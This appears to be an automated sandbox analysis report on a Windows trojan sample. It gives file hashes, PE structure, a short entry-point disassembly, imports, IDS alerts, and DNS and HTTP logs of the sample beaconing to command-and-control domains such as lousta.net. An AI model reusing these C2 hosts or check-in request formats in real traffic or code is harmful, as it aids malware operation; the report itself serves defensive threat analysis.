                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:16
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:cOviNFmw21.exe
                renamed because original name is a hash value
                Original Sample Name:7a492eaf1df94ad3ffea031e184f81099ed752dce08e77aba9ed657ead97dc3f.exe
                Detection:MAL
                Classification:mal100.bank.troj.evad.winEXE@7/3@3/3
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 23
                • Number of non-executed functions: 69
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes were analyzed; report is missing behavior information
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: cOviNFmw21.exe
                Time | Type | Description
                12:04:09 | API Interceptor | 12x Sleep call for process: omsecor.exe modified
                Process:C:\Users\user\Desktop\cOviNFmw21.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):4.700261069108173
                Encrypted:false
                SSDEEP:768:gMEIvFGvZEr8LFK0ic46N47eSdYAHwmZwSp6JXXlaa5uA:gbIvYvZEyFKF6N4yS+AQmZcl/5
                MD5:9CB842FFDA5CC91A433FD8C8655C0678
                SHA1:9A94A3A65ADE88A164E0D7ED451D26B7AF41F6FB
                SHA-256:99C4637BFD77D17EC3A9D8A7D95C65C8045720A083F6741776AA8147ACF89C99
                SHA-512:D24054996135B838E73C795A5FBDC1054D985E56E7C9743501D8F46AF071292C98AEF444733BBD07F9B08613FD92B3459453B0D648B0C037D94347F7D9075409
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 96%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m.m.m...m.m.m...m^..m...m^..m...m...m.m.m.m...m.m.m...mRich...m................PE..L...*.P............................F.............@.........................................................................|...........................................................................@............................................text............................... ..`.rdata..D!......."..................@..@.data...,q..........................@...........................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\omsecor.exe
                File Type:data
                Category:dropped
                Size (bytes):100
                Entropy (8bit):1.8777353867706772
                Encrypted:false
                SSDEEP:3:gtqyumdZp8zFmLV:gwDmL+zFmx
                MD5:7BEA8C5EE2FE04D87297BECD6315EA16
                SHA1:7FF580C4573D8DFABBCD7E5F01B20F64BE6FC40D
                SHA-256:91A102D381A67E229350136926A23C0A4F25245DC3CB1C199C08D16845201782
                SHA-512:7B795789B138A8FE45C6CF6368A105292DA520F6483BA446CBE03F5C011AFFE15326885DEBAF604AB6F59BD293A23876D9083B82577B9EA6DA97200900D58AC2
                Malicious:false
                Reputation:low
                Preview:-x.x.x.x.x.x6x.x.xxxIxKxKxOxOx@xAxOxKxNx@xKxLxJxOx@xNxHxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
                Process:C:\Users\user\AppData\Roaming\omsecor.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):4.700257409382838
                Encrypted:false
                SSDEEP:768:TMEIvFGvZEr8LFK0ic46N47eSdYAHwmZwSp6JXXlaa5uA:TbIvYvZEyFKF6N4yS+AQmZcl/5
                MD5:647527DE20AF8BB173C26019E8811EED
                SHA1:94665B1D056473F1F209127995ACDE6AD83B7916
                SHA-256:552EDA5BFCFCAFD98BB4DF40AD07D19E9FEC270B31DF8888DAF865FE91B99127
                SHA-512:8B44ED709643DF262C700C549F225E4E1A745302BF29DBB3C9E252ADE696E5CE910A46C59D7B8131BAC76D7168826BF1969C3D9A880182BC3E4FE0A756477762
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m.m.m...m.m.m...m^..m...m^..m...m...m.m.m.m...m.m.m...mRich...m................PE..L.....P............................F.............@.........................................................................|...........................................................................@............................................text............................... ..`.rdata..D!......."..................@..@.data...,q..........................@...........................................................................................................................................................................................................................................................................................................................................................................................................................
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):4.700177279604877
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:cOviNFmw21.exe
                File size:65'536 bytes
                MD5:73e5f0f01bf8368b8b82432b027610e5
                SHA1:ecf068b47a2747e0ef0286c6f9d03f2f8aacfaa7
                SHA256:7a492eaf1df94ad3ffea031e184f81099ed752dce08e77aba9ed657ead97dc3f
                SHA512:46d0172face375c9f10315a571080a1d6af155e4b7209eafb8caf5b90e9761219afeffa54eff935b5d915b009bfbfefe65bd4ee0c7f8207c21291d74f0726791
                SSDEEP:768:NMEIvFGvZEr8LFK0ic46N47eSdYAHwmZwSp6JXXlaa5uA:NbIvYvZEyFKF6N4yS+AQmZcl/5
                TLSH:CB538D9472F9803AE2B20D745D7E988189BEBD7826F0C5C6D3115C8B6DB46C2D53B3A3
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m.m.m...m.m.m...m^..m...m^..m...m...m...m.m.m...m.m.m...mRich...m................PE..L......P...................
                Icon Hash:00928e8e8686b000
                Entrypoint:0x40b346
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:
                Time Stamp:0x50B1DFF8 [Sun Nov 25 09:08:08 2012 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:08b67a9663d3a8c9505f3b2561bbdd1c
                Instruction
                push ebp
                mov ebp, esp
                mov eax, 00001800h
                call 00007FBE948D94C2h
                push ebx
                push esi
                push edi
                mov edi, dword ptr [0040E0B0h]
                mov esi, 00000400h
                push esi
                lea eax, dword ptr [ebp-00000800h]
                push eax
                xor ebx, ebx
                push ebx
                call edi
                push 0040F4FCh
                lea eax, dword ptr [ebp-00000800h]
                call 00007FBE948D137Ah
                test eax, eax
                pop ecx
                je 00007FBE948D72BFh
                lea eax, dword ptr [ebp-00001800h]
                push eax
                call 00007FBE948D6AF6h
                test eax, eax
                pop ecx
                jne 00007FBE948D72AEh
                push esi
                lea eax, dword ptr [ebp-00000800h]
                push eax
                push ebx
                call edi
                push 00000001h
                lea eax, dword ptr [ebp-00000800h]
                push eax
                push 0040F414h
                push 0040F1D8h
                push 80000001h
                call 00007FBE948D28A6h
                add esp, 14h
                test eax, eax
                push 00000004h
                je 00007FBE948D7267h
                push ebx
                push 00000003h
                jmp 00007FBE948D726Bh
                call dword ptr [0040E064h]
                push eax
                push 00000006h
                call 00007FBE948D6613h
                add esp, 0Ch
                call 00007FBE948D7153h
                call 00007FBE948D697Dh
                test eax, eax
                jne 00007FBE948D7254h
                call 00007FBE948D69F3h
                test eax, eax
                je 00007FBE948D72C3h
                push 00002710h
                call dword ptr [0040E070h]
                push 00000004h
                push ebx
                push 00000009h
                call 00007FBE948D65E4h
                add esp, 0Ch
                push esi
                lea eax, dword ptr [ebp+00000000h]
                Programming Language:
                • [ASM] VS2005 build 50727
                • [ C ] VS2005 build 50727
                • [LNK] VS2005 build 50727
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf77c | 0xb4 | .rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xf6a8 | 0x40 | .rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0xe000 | 0x1b4 | .rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                .text | 0x1000 | 0xcc18 | 0xce00 | 714a894e8b5f787903d790e888652926 | False | 0.3713971480582524 | data | 4.766581687246585 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata | 0xe000 | 0x2144 | 0x2200 | 80dd2fa89c5c981edf446c3b17f9e467 | False | 0.4460018382352941 | data | 4.452292898356236 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data | 0x11000 | 0x1712c | 0x200 | 9159e4683d74ea27f29c3b096294f663 | False | 0.466796875 | data | 3.7016590486098133 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                DLL | Import
                WININET.dll | HttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetSetPerSiteCookieDecisionW, InternetOpenUrlW, InternetAttemptConnect, InternetOpenW, InternetReadFile, InternetClearAllPerSiteCookieDecisions, InternetCloseHandle, InternetQueryDataAvailable, InternetSetOptionW
                SHLWAPI.dll | StrStrIW, PathMatchSpecW, PathCombineW, wvnsprintfW, StrStrIA, PathRemoveFileSpecW
                KERNEL32.dll | TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, GetVersionExA, HeapReAlloc, RtlUnwind, WideCharToMultiByte, MultiByteToWideChar, HeapCreate, CopyFileW, CreateThread, WaitForMultipleObjects, GetTickCount, DeleteFileW, CreateProcessW, SetUnhandledExceptionFilter, ExitProcess, GetLastError, LoadLibraryW, GetProcAddress, Sleep, VirtualProtect, GetPrivateProfileIntW, ExpandEnvironmentStringsW, GetPrivateProfileStringW, FindFirstFileW, SetFilePointer, SetEndOfFile, GetVersionExW, HeapAlloc, SetWaitableTimer, SystemTimeToFileTime, CreateWaitableTimerW, FindNextFileW, HeapFree, ReadFile, GetModuleFileNameW, GetFileTime, WaitForSingleObject, GetTimeZoneInformation, CreateFileW, CloseHandle, GetFileSizeEx, VirtualFree, GetProcessHeap, GetCurrentDirectoryW, VirtualAlloc, VirtualQuery, GetSystemTime, GetFileSize, FindClose, WriteFile, GetLocalTime, GetModuleHandleW, GetCommandLineW
                USER32.dll | GetWindowLongW, DispatchMessageW, GetForegroundWindow, CharLowerW, CreateWindowExW, FindWindowW, PeekMessageW, SetForegroundWindow, GetSystemMetrics, MessageBoxW, SetWindowPos, SetWindowLongW, SetParent
                ADVAPI32.dll | RegOpenKeyExW, RegEnumKeyExW, RegQueryValueExW, RegSetValueExW, RegCreateKeyExW, RegCloseKey
                SHELL32.dll | SHGetFolderPathW
                ole32.dll | CoCreateInstance, OleInitialize, CoInitialize
                OLEAUT32.dll | SysFreeString, VariantInit, SysAllocString, VariantClear
                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                2024-12-05T18:04:08.431834+0100 | 2016998 | ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) | 1 | 192.168.2.7 | 49699 | 193.166.255.171 | 80 | TCP
                2024-12-05T18:04:10.619663+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49699 | 193.166.255.171 | 80 | TCP
                2024-12-05T18:04:32.754783+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49700 | 193.166.255.171 | 80 | TCP
                2024-12-05T18:04:34.471615+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49742 | 15.197.204.56 | 80 | TCP
                2024-12-05T18:04:36.659210+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49748 | 52.34.198.229 | 80 | TCP
                2024-12-05T18:04:36.659257+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 52.34.198.229 | 80 | 192.168.2.7 | 49748 | TCP
                2024-12-05T18:04:36.659257+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 52.34.198.229 | 80 | 192.168.2.7 | 49748 | TCP
                2024-12-05T18:04:59.095440+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49754 | 193.166.255.171 | 80 | TCP
                2024-12-05T18:05:21.253614+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49803 | 193.166.255.171 | 80 | TCP
                2024-12-05T18:05:22.615655+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49851 | 15.197.204.56 | 80 | TCP
                2024-12-05T18:05:24.218147+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49857 | 52.34.198.229 | 80 | TCP
                2024-12-05T18:05:46.346450+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49862 | 193.166.255.171 | 80 | TCP
                2024-12-05T18:06:08.472191+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49913 | 193.166.255.171 | 80 | TCP
                2024-12-05T18:06:09.821016+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49965 | 15.197.204.56 | 80 | TCP
                2024-12-05T18:06:11.428062+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 49969 | 52.34.198.229 | 80 | TCP
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Dec 5, 2024 18:06:08.472381115 CET4991380192.168.2.7193.166.255.171
                Dec 5, 2024 18:06:08.590435982 CET4985180192.168.2.715.197.204.56
                Dec 5, 2024 18:06:08.590816021 CET4996580192.168.2.715.197.204.56
                Dec 5, 2024 18:06:08.592125893 CET8049913193.166.255.171192.168.2.7
                Dec 5, 2024 18:06:08.710678101 CET804996515.197.204.56192.168.2.7
                Dec 5, 2024 18:06:08.710761070 CET4996580192.168.2.715.197.204.56
                Dec 5, 2024 18:06:08.711038113 CET804985115.197.204.56192.168.2.7
                Dec 5, 2024 18:06:08.711040020 CET4996580192.168.2.715.197.204.56
                Dec 5, 2024 18:06:08.711081028 CET4985180192.168.2.715.197.204.56
                Dec 5, 2024 18:06:08.831403017 CET804996515.197.204.56192.168.2.7
                Dec 5, 2024 18:06:09.820947886 CET804996515.197.204.56192.168.2.7
                Dec 5, 2024 18:06:09.821016073 CET4996580192.168.2.715.197.204.56
                Dec 5, 2024 18:06:09.944407940 CET4996980192.168.2.752.34.198.229
                Dec 5, 2024 18:06:10.065933943 CET804996952.34.198.229192.168.2.7
                Dec 5, 2024 18:06:10.066041946 CET4996980192.168.2.752.34.198.229
                Dec 5, 2024 18:06:10.066677094 CET4996980192.168.2.752.34.198.229
                Dec 5, 2024 18:06:10.186336994 CET804996952.34.198.229192.168.2.7
                Dec 5, 2024 18:06:11.427999020 CET804996952.34.198.229192.168.2.7
                Dec 5, 2024 18:06:11.428061962 CET4996980192.168.2.752.34.198.229
                Dec 5, 2024 18:06:11.428217888 CET804996952.34.198.229192.168.2.7
                Dec 5, 2024 18:06:11.428270102 CET4996980192.168.2.752.34.198.229
                Dec 5, 2024 18:06:11.428947926 CET4996980192.168.2.752.34.198.229
                Dec 5, 2024 18:06:11.548582077 CET804996952.34.198.229192.168.2.7
                Dec 5, 2024 18:06:11.667993069 CET4997280192.168.2.7193.166.255.171
                Dec 5, 2024 18:06:11.686968088 CET4996580192.168.2.715.197.204.56
                Dec 5, 2024 18:06:11.787787914 CET8049972193.166.255.171192.168.2.7
                Dec 5, 2024 18:06:11.787935972 CET4997280192.168.2.7193.166.255.171
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Dec 5, 2024 18:04:07.947885990 CET | 53994 | 53 | 192.168.2.7 | 1.1.1.1
                Dec 5, 2024 18:04:08.407656908 CET | 53 | 53994 | 1.1.1.1 | 192.168.2.7
                Dec 5, 2024 18:04:32.883596897 CET | 59024 | 53 | 192.168.2.7 | 1.1.1.1
                Dec 5, 2024 18:04:33.246804953 CET | 53 | 59024 | 1.1.1.1 | 192.168.2.7
                Dec 5, 2024 18:04:34.591979027 CET | 51863 | 53 | 192.168.2.7 | 1.1.1.1
                Dec 5, 2024 18:04:35.172810078 CET | 53 | 51863 | 1.1.1.1 | 192.168.2.7
                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                Dec 5, 2024 18:04:07.947885990 CET | 192.168.2.7 | 1.1.1.1 | 0xb8cf | Standard query (0) | lousta.net | A (IP address) | IN (0x0001) | false
                Dec 5, 2024 18:04:32.883596897 CET | 192.168.2.7 | 1.1.1.1 | 0x652c | Standard query (0) | mkkuei4kdsz.com | A (IP address) | IN (0x0001) | false
                Dec 5, 2024 18:04:34.591979027 CET | 192.168.2.7 | 1.1.1.1 | 0x1fdb | Standard query (0) | ow5dirasuek.com | A (IP address) | IN (0x0001) | false
                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                Dec 5, 2024 18:04:08.407656908 CET | 1.1.1.1 | 192.168.2.7 | 0xb8cf | No error (0) | lousta.net | | 193.166.255.171 | A (IP address) | IN (0x0001) | false
                Dec 5, 2024 18:04:33.246804953 CET | 1.1.1.1 | 192.168.2.7 | 0x652c | No error (0) | mkkuei4kdsz.com | | 15.197.204.56 | A (IP address) | IN (0x0001) | false
                Dec 5, 2024 18:04:33.246804953 CET | 1.1.1.1 | 192.168.2.7 | 0x652c | No error (0) | mkkuei4kdsz.com | | 3.33.243.145 | A (IP address) | IN (0x0001) | false
                Dec 5, 2024 18:04:35.172810078 CET | 1.1.1.1 | 192.168.2.7 | 0x1fdb | No error (0) | ow5dirasuek.com | | 52.34.198.229 | A (IP address) | IN (0x0001) | false
                • lousta.net
                • mkkuei4kdsz.com
                • ow5dirasuek.com
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.7 | 49699 | 193.166.255.171 | 80 | 3808 | C:\Users\user\AppData\Roaming\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Dec 5, 2024 18:04:08.552088976 CET | 186 | OUT | GET /616/595.html HTTP/1.1
                From: 133778918465242887
                Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;
                Host: lousta.net
                Connection: Keep-Alive
                Dec 5, 2024 18:04:08.915066957 CET | 186 | OUT | GET /616/595.html HTTP/1.1
                From: 133778918465242887
                Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;
                Host: lousta.net
                Connection: Keep-Alive
                Dec 5, 2024 18:04:09.274391890 CET | 186 | OUT | GET /616/595.html HTTP/1.1
                From: 133778918465242887
                Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;
                Host: lousta.net
                Connection: Keep-Alive


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                1 | 192.168.2.7 | 49700 | 193.166.255.171 | 80 | 3808 | C:\Users\user\AppData\Roaming\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Dec 5, 2024 18:04:10.849632978 CET | 186 | OUT | GET /562/345.html HTTP/1.1
                From: 133778918465242887
                Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;
                Host: lousta.net
                Connection: Keep-Alive


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                2 | 192.168.2.7 | 49742 | 15.197.204.56 | 80 | 3808 | C:\Users\user\AppData\Roaming\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Dec 5, 2024 18:04:33.367984056 CET | 190 | OUT | GET /910/77.html HTTP/1.1
                From: 133778918465242887
                Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;
                Host: mkkuei4kdsz.com
                Connection: Keep-Alive
                Dec 5, 2024 18:04:34.471554995 CET | 259 | IN | HTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 05 Dec 2024 17:04:34 GMT
                Content-Type: text/html
                Content-Length: 114
                Connection: keep-alive
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                3 | 192.168.2.7 | 49748 | 52.34.198.229 | 80 | 3808 | C:\Users\user\AppData\Roaming\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Dec 5, 2024 18:04:35.294480085 CET | 190 | OUT | GET /56/763.html HTTP/1.1
                From: 133778918465242887
                Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;
                Host: ow5dirasuek.com
                Connection: Keep-Alive
                Dec 5, 2024 18:04:36.659149885 CET | 415 | IN | HTTP/1.1 200 OK
                Server: nginx
                Date: Thu, 05 Dec 2024 17:04:36 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: btst=53bc98c7fd76f7846aa5411ec8e5a6dc|8.46.123.228|1733418276|1733418276|0|1|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                4 | 192.168.2.7 | 49754 | 193.166.255.171 | 80 | 1732 | C:\Windows\SysWOW64\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Dec 5, 2024 18:04:37.187115908 CET | 186 | OUT | GET /115/685.html HTTP/1.1
                From: 133778973683427860
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
                Host: lousta.net
                Connection: Keep-Alive


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                5 | 192.168.2.7 | 49803 | 193.166.255.171 | 80 | 1732 | C:\Windows\SysWOW64\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Dec 5, 2024 18:04:59.334496975 CET | 185 | OUT | GET /54/325.html HTTP/1.1
                From: 133778973683427860
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
                Host: lousta.net
                Connection: Keep-Alive


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                6 | 192.168.2.7 | 49851 | 15.197.204.56 | 80 | 1732 | C:\Windows\SysWOW64\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Dec 5, 2024 18:05:21.493674040 CET | 191 | OUT | GET /402/288.html HTTP/1.1
                From: 133778973683427860
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
                Host: mkkuei4kdsz.com
                Connection: Keep-Alive
                Dec 5, 2024 18:05:22.615412951 CET | 259 | IN | HTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 05 Dec 2024 17:05:22 GMT
                Content-Type: text/html
                Content-Length: 114
                Connection: keep-alive
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                7 | 192.168.2.7 | 49857 | 52.34.198.229 | 80 | 1732 | C:\Windows\SysWOW64\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Dec 5, 2024 18:05:22.853296995 CET | 298 | OUT | GET /372/940.html HTTP/1.1
                From: 133778973683427860
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
                Host: ow5dirasuek.com
                Connection: Keep-Alive
                Cookie: snkz=8.46.123.228; btst=53bc98c7fd76f7846aa5411ec8e5a6dc|8.46.123.228|1733418276|1733418276|0|1|0
                Dec 5, 2024 18:05:24.217924118 CET | 338 | IN | HTTP/1.1 200 OK
                Server: nginx
                Date: Thu, 05 Dec 2024 17:05:23 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: btst=53bc98c7fd76f7846aa5411ec8e5a6dc|8.46.123.228|1733418323|1733418276|23|2|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                8 | 192.168.2.7 | 49862 | 193.166.255.171 | 80 | 1732 | C:\Windows\SysWOW64\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Dec 5, 2024 18:05:24.455173969 CET | 186 | OUT | GET /158/950.html HTTP/1.1
                From: 133778973683427860
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
                Host: lousta.net
                Connection: Keep-Alive


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                9 | 192.168.2.7 | 49913 | 193.166.255.171 | 80 | 1732 | C:\Windows\SysWOW64\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Dec 5, 2024 18:05:46.569494009 CET | 185 | OUT | GET /352/26.html HTTP/1.1
                From: 133778973683427860
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
                Host: lousta.net
                Connection: Keep-Alive


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                10 | 192.168.2.7 | 49965 | 15.197.204.56 | 80 | 1732 | C:\Windows\SysWOW64\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Dec 5, 2024 18:06:08.711040020 CET | 191 | OUT | GET /697/241.html HTTP/1.1
                From: 133778973683427860
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
                Host: mkkuei4kdsz.com
                Connection: Keep-Alive
                Dec 5, 2024 18:06:09.820947886 CET | 259 | IN | HTTP/1.1 200 OK
